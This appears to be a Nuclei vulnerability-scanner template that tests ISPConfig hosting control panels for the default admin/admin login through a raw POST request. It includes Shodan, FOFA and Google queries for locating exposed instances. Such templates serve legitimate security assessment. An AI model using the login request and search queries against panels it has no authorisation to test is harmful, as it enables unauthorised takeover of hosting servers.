id: ispconfig-hcp-default-login

info:
  name: ISPConfig Hosting Control Panel - Default Login
  author: ritikchaddha
  severity: high
  description: |
    ISPConfig Hosting Control Panel default login credentials were discovered.
  classification:
    cpe: cpe:2.3:a:ispconfig:ispconfig:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ispconfig
    product: ispconfig
    shodan-query: http.title:"ispconfig" http.favicon.hash:483383992
    fofa-query: title="ispconfig" http.favicon.hash:483383992
    google-query: intitle:"ispconfig" http.favicon.hash:483383992
    runzero-match: any(each(service["html.titles"]), {# matches "ISPConfig"})
  tags: ispconfig,hsp,default-login

http:
  - raw:
      - |
        POST /content.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&passwort={{password}}&s_mod=login&s_pg=index

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'LOGIN_REDIRECT:dashboard/dashboard.php'

      - type: word
        part: header
        words:
          - 'Set-Cookie'

      - type: status
        status:
          - 200

